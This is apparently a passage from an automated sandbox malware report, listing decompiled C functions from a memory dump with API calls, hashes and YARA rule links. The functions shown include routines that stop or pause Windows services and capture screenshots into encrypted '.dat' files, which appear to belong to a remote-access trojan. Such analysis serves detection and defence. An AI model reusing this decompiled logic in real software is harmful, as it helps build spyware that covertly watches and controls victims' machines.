Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm has been triggered!$[ALARM]
API String ID: 614609389-1190268461
Opcode ID: a72f7bbe0ff649907879a8ec4559d77060f8c7e034846c054ca5bf069f778dcf
Instruction ID: 3dbfa3bc3acc833274b6e0f43357c326849184f6c95de14e1e3858e62b15b156
Opcode Fuzzy Hash: a72f7bbe0ff649907879a8ec4559d77060f8c7e034846c054ca5bf069f778dcf
Instruction Fuzzy Hash: D9E09222A00221379514376A6D0FD6F3D28CAC2B62B01016FFE08661829D944810C6FB

Uniqueness

Uniqueness Score: -1.00%

Function 00435799, Relevance: 9.3, APIs: 6, Instructions: 284
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00435799(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = E0043A504();
					_t159 = 0x16;
					 *_t113 = _t159;
					E0043695D();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = E0043A504();
					_t158 = 0x16;
					 *_t111 = _t158;
					E0043695D();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = E0043A504();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				E0044309E(0, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E004428D3( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = E004428FF( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = E0044292B( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_push(_t155);
								_t78 = E0043C6D7();
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = L00450C70(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = E00450BC0(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									_t28 = _t155 + 4; // 0x848d0045
									asm("cdq");
									_t150 = _t82 +  *_t28;
									asm("adc ebx, edx");
									_t84 = L00450C70(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = E00450BC0(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									_t31 = _t155 + 8; // 0xa824
									asm("cdq");
									_t152 = _t85 +  *_t31;
									asm("adc ebx, edx");
									_t87 = L00450C70(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = E00450BC0(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										_t44 = _t155 + 0x18; // 0xa024848d
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t51 = _t155 + 0xc; // 0x50506a00
										_t93 =  *_t51;
										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t155 + 0x18; // 0xa024848d
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = E004430EF(_t120, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_push(_t155);
									_v20 = _t118;
									_t78 = E0043C6D7();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = E004430EF(_t118, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E0043C6D7();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0043698A();
				asm("int3");
				_push(_t155);
				_t69 = E0043C672(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E00435799(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}

0x00435799
0x004357a2
0x004357a7
0x004357a9
0x004357b0
0x004357b1
0x004357b3
0x00000000
0x004357b8
0x004357bc
0x004357c4
0x004357c5
0x004357c7
0x004357ca
0x004357cc
0x004357ce
0x004357d5
0x004357d6
0x004357d8
0x004357dd
0x0043580e
0x00000000
0x0043580e
0x004357e1
0x004357e4
0x004357e7
0x004357e9
0x00435801
0x00435801
0x00435808
0x00435809
0x0043580b
0x0043580d
0x00000000
0x0043580d
0x004357eb
0x004357ed
0x00000000
0x00000000
0x004357ed
0x004357f1
0x004357f2
0x004357f5
0x004357f7
0x00000000
0x00000000
0x004357f9
0x004357ff
0x00000000
0x00000000
0x004357ff
0x00435814
0x0043581c
0x00435820
0x00435823
0x00435826
0x0043582b
0x0043582c
0x0043582e
0x00435838
0x0043583d
0x0043583e
0x00435840
0x0043584a
0x0043584f
0x00435850
0x00435852
0x00435858
0x0043585b
0x0043585d
0x0043585f
0x004358e0
0x004358e0
0x004358e1
0x004358e2
0x004358e9
0x004358eb
0x00000000
0x00000000
0x004358f1
0x004358f7
0x004358f8
0x004358fa
0x004358fc
0x00435918
0x00435918
0x0043591b
0x0043591b
0x0043591c
0x00435922
0x00435926
0x0043592b
0x0043592d
0x0043592f
0x00435934
0x00435937
0x00435939
0x00435939
0x00435942
0x00435949
0x0043594b
0x0043594e
0x0043594f
0x00435955
0x00435959
0x0043595e
0x00435961
0x00435963
0x00435968
0x0043596b
0x0043596e
0x0043596e
0x00435977
0x0043597e
0x00435980
0x00435983
0x00435984
0x0043598a
0x0043598e
0x00435993
0x00435996
0x00435998
0x0043599d
0x004359a0
0x004359a3
0x004359a3
0x004359b1
0x004359b3
0x004359b5
0x004359e2
0x004359e2
0x004359e8
0x004359ef
0x004359f0
0x004359f3
0x004359f3
0x004359f6
0x004359f9
0x004359fb
0x00000000
0x00000000
0x00435a00
0x00435a07
0x00435a0a
0x00435a10
0x00435a13
0x00000000
0x004359b7
0x004359b7
0x004359bd
0x004359bd
0x004359c4
0x004359c5
0x004359c8
0x004359c8
0x004359c8
0x004359cb
0x004359ce
0x004359ce
0x004359ce
0x004359ce
0x004359d1
0x004359d1
0x00000000
0x004359d1
0x004359b9
0x004359bb
0x004359d8
0x004359da
0x00000000
0x00000000
0x004359dc
0x00000000
0x00000000
0x004359de
0x004359e0
0x00000000
0x00000000
0x00000000
0x004359e0
0x00000000
0x004359bb
0x004359b5
0x004358fe
0x004358ff
0x00435905
0x00435907
0x00000000
0x00000000
0x0043590c
0x0043590f
0x00000000
0x0043590f
0x00435861
0x0043586b
0x0043586d
0x0043586e
0x00435870
0x00000000
0x00000000
0x00435872
0x0043587c
0x0043587f
0x00435885
0x00435886
0x00435888
0x0043588b
0x0043588c
0x0043588f
0x00435896
0x00435898
0x00000000
0x00000000
0x0043589e
0x004358a1
0x00000000
0x00000000
0x004358a7
0x004358a8
0x004358ae
0x004358b0
0x00000000
0x00000000
0x004358b9
0x004358ba
0x004358c0
0x004358c1
0x004358c4
0x004358c5
0x004358cc
0x004358ce
0x00000000
0x00000000
0x004358d4
0x00000000
0x004358d4
0x00435874
0x0043587a
0x00000000
0x00000000
0x00000000
0x0043587a
0x00435863
0x00435869
0x00000000
0x00000000
0x00000000
0x00435869
0x00435852
0x00435840
0x00435a18
0x00435a19
0x00435a1a
0x00435a1b
0x00435a1c
0x00435a1d
0x00435a22
0x00435a28
0x00435a29
0x00435a2e
0x00435a30
0x00435a32
0x00435a34
0x00435a38
0x00435a40
0x00435a45
0x00435a45
0x00000000
0x00435a45
0x00435a49

APIs

__allrem.LIBCMT ref: 00435926
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435942
__allrem.LIBCMT ref: 00435959
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435977
__allrem.LIBCMT ref: 0043598E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004359AC

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
Instruction ID: 35372c1425533dcebe3bda436374fdb164c2facb18fb88ba24de970f82e87be5
Opcode Fuzzy Hash: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
Instruction Fuzzy Hash: 4D810972600F06ABE724AE69CC42B6B73E8AF49778F24552FF411D7681E77CD9008798

Uniqueness

Uniqueness Score: -1.00%

Function 0043F14E, Relevance: 9.2, APIs: 6, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0043F14E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = L0043AE14( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E0043F348(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E004401F5(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = L0043AE14(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E0043E4D0(_t97, _t103, _t120, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E0043698A();
							asm("int3");
							E0042FB60(0x468270, 0x1c);
							_t130 = _a4;
							_t75 = E0043F14E(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = L00441CE2(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E0043B53B( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E0043F98C(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E0043B53B( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E0043F0DD(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E004401F5( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x46a9a4 & 0x00000001;
												if(( *0x46a9a4 & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E004401F5( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E0043F33F();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E004401F5(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E0043698A();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E0042FBA6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E0043E4D0(__ebx, _t101, __edx, _a4, 0);
					L12:
					return _t70;
				}
			}

0x0043f14e
0x0043f14e
0x0043f153
0x0043f158
0x0043f168
0x0043f169
0x0043f172
0x0043f17a
0x0043f17f
0x0043f182
0x0043f184
0x0043f190
0x0043f19a
0x0043f19d
0x0043f19e
0x0043f1a0
0x0043f1d1
0x0043f1d2
0x0043f1d8
0x00000000
0x0043f1a2
0x0043f1ac
0x0043f1b1
0x0043f1b4
0x0043f1b6
0x0043f1cf
0x00000000
0x0043f1b8
0x0043f1b8
0x0043f1bb
0x00000000
0x0043f1bd
0x0043f1bd
0x0043f1c0
0x00000000
0x0043f1c2
0x00000000
0x0043f1c2
0x0043f1c0
0x0043f1bb
0x0043f1b6
0x0043f186
0x0043f186
0x0043f189
0x0043f1e0
0x0043f1e0
0x0043f1e1
0x0043f1e2
0x0043f1e3
0x0043f1e5
0x0043f1ea
0x0043f1f2
0x0043f1fa
0x0043f1fe
0x0043f204
0x0043f205
0x0043f207
0x0043f209
0x0043f212
0x0043f217
0x0043f21d
0x0043f220
0x0043f223
0x0043f228
0x0043f237
0x0043f23c
0x0043f23f
0x0043f241
0x0043f25b
0x0043f268
0x0043f26a
0x0043f26c
0x00000000
0x0043f26e
0x0043f26e
0x0043f271
0x0043f274
0x0043f27f
0x0043f282
0x0043f287
0x0043f28a
0x0043f28c
0x0043f2af
0x0043f2af
0x0043f2b4
0x0043f2b9
0x0043f2ba
0x0043f2be
0x0043f2c4
0x0043f2c7
0x0043f2c9
0x0043f2cd
0x0043f2d1
0x0043f2d7
0x0043f2dc
0x0043f2dd
0x0043f2e2
0x0043f2e2
0x0043f2e2
0x0043f2d1
0x0043f2e5
0x0043f2e8
0x0043f2ef
0x0043f2f1
0x0043f2f8
0x0043f2fe
0x0043f300
0x0043f302
0x0043f306
0x0043f307
0x0043f30d
0x0043f313
0x0043f313
0x0043f313
0x0043f313
0x0043f307
0x0043f300
0x0043f2f8
0x0043f31b
0x0043f31d
0x0043f324
0x0043f328
0x0043f32f
0x0043f28e
0x0043f28e
0x0043f291
0x0043f298
0x0043f298
0x0043f299
0x0043f29a
0x0043f29b
0x0043f29c
0x00000000
0x0043f293
0x0043f293
0x0043f296
0x0043f29f
0x0043f2a1
0x00000000
0x0043f2a3
0x0043f2a4
0x00000000
0x0043f2a9
0x00000000
0x00000000
0x00000000
0x0043f296
0x0043f291
0x0043f28c
0x0043f243
0x0043f243
0x0043f246
0x0043f24d
0x0043f24d
0x0043f24e
0x0043f24f
0x0043f250
0x0043f251
0x0043f252
0x0043f252
0x0043f248
0x0043f248
0x0043f24b
0x00000000
0x00000000
0x0043f24b
0x0043f257
0x0043f259
0x00000000
0x00000000
0x00000000
0x00000000
0x0043f259
0x0043f20b
0x0043f20b
0x0043f20b
0x0043f33b
0x0043f18b
0x0043f18b
0x0043f18e
0x00000000
0x00000000
0x00000000
0x00000000
0x0043f18e
0x0043f189
0x0043f15a
0x0043f15f
0x0043f1dc
0x0043f1df
0x0043f1df

APIs

__cftoe.LIBCMT ref: 0043F17A
__cftoe.LIBCMT ref: 0043F1AC

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 91f3ff71f9d72ab0dbe479f0621ac8c4477b43ed9e3186f1d16d6ba6c8e23502
Instruction ID: bcbe42ceaebb365c1ac6e2a5e9ed457d7b54482c9f0ea6a0937b1c10150bb98b
Opcode Fuzzy Hash: 91f3ff71f9d72ab0dbe479f0621ac8c4477b43ed9e3186f1d16d6ba6c8e23502
Instruction Fuzzy Hash: E451E432D00205EADF249B69DC41BAF77A8AF4D324F60527FF91592282DB3DDD048A6C

Uniqueness

Uniqueness Score: -1.00%

Function 0041640B, Relevance: 9.0, APIs: 6, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041640B(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x20);
				_t19 = OpenServiceW(_t20, L00401EEB( &_a4), 0x20);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				L00401EF0();
				return _t16;
			}

0x00416416
0x00416425
0x00416434
0x00416438
0x00416459
0x0041645c
0x0041645f
0x0041643a
0x0041643b
0x0041643b
0x00416464
0x00416471

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00415FB6,00000000), ref: 0041641A
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00415FB6,00000000), ref: 0041642E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041643B
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415FB6,00000000), ref: 0041644A
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645F

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
Instruction ID: 4eedda638a80435df945b1a666cb81191fe5a480f3a20e792e67f186b8beea13
Opcode Fuzzy Hash: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
Instruction Fuzzy Hash: 16F0F6315403187BD211AF65DC89DBF3B6CDB45B92F00002AFD0593192DF28CE4596F9

Uniqueness

Uniqueness Score: -1.00%

Function 00416576, Relevance: 9.0, APIs: 6, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416576(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20, L00401EEB( &_a4), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				L00401EF0();
				return _t16;
			}

0x00416581
0x00416590
0x0041659f
0x004165a3
0x004165c4
0x004165c7
0x004165ca
0x004165a5
0x004165a6
0x004165a6
0x004165cf
0x004165dc

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415EB6,00000000), ref: 00416585
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415EB6,00000000), ref: 00416599
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165A6
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00415EB6,00000000), ref: 004165B5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165C7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165CA

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
Instruction ID: f156ac7e468d3ae20af57b6ed191c57fcc92838d981ab40ed78c867a72fe8b74
Opcode Fuzzy Hash: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
Instruction Fuzzy Hash: 6DF0C2315413187BD211AF65EC49EBF3BACDB45B92B00002AFE0992196DA38CE4596E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041576E, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041576E(void* __ecx, void* __edx, void* __eflags) {
				char _v1048;
				char _v1056;
				char _v1092;
				void* _v1096;
				char _v1112;
				char _v1120;
				void* _v1124;
				void* _v1136;
				char _v1144;
				char _v1152;
				char _v1156;
				void* _v1160;
				char _v1184;
				char _v1200;
				void* _v1204;
				char _v1224;
				char _v1232;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t39;
				void* _t54;
				void* _t57;
				void* _t60;
				void* _t67;
				void* _t73;
				char* _t84;
				char* _t86;
				void* _t120;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				signed int _t128;
				void* _t130;

				_t133 = __eflags;
				_t130 = (_t128 & 0xfffffff8) - 0x4b4;
				_t121 = __ecx;
				_t74 = __edx;
				E004030A6(__edx,  &_v1184, E0040427F(__edx,  &_v1156, __ecx), _t121, __eflags, L"png");
				L00401EF0();
				E00414906( &_v1120, __edx, __eflags, 0);
				_t84 =  &_v1120;
				_t39 =  *0x46bb04(L00401F95(_t84), E00402489(), _t120, _t123, _t73);
				_t124 = _t39;
				E0041441B( &_v1144, _t124);
				_t86 = L"image/png";
				L00414C72(_t86,  &_v1112);
				E00414493(L00401EEB( &_v1200),  &_v1152, _t43,  &_v1112);
				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
				if( *((char*)(L00401F95(L00401E49(0x46c578,  &_v1112, _t133, 0x1b)))) == 1) {
					E004020D5(__edx,  &_v1224);
					_t54 = E004179DC(L00401EEB( &_v1200),  &_v1224);
					_t135 = _t54;
					if(_t54 != 0) {
						DeleteFileW(L00401EEB( &_v1200));
						_t57 = E00402489();
						E00405A7C( &_v1048, L00401F95(0x46c560), _t57);
						_t60 = E00402489();
						E00405BA4(_t74,  &_v1056,  &_v1224,  &_v1184, L00401F95( &_v1232), _t60);
						E004030A6(_t74,  &_v1120, E0040427F(_t74,  &_v1092, _t121), _t121, _t135, L"dat");
						L00401EF0();
						_t67 = L00401EEB( &_v1120);
						E004020EC(_t74, _t130 - 0x18, _t64, _t135,  &_v1200);
						E00417A4E(_t67);
						L00401EF0();
						E00401FC7();
					}
					_t48 = E00401FC7();
				}
				E00414441(_t48,  &_v1152);
				E00401FC7();
				return L00401EF0();
			}

0x0041576e
0x00415774
0x0041577d
0x0041577f
0x00415796
0x004157a0
0x004157ad
0x004157bd
0x004157c7
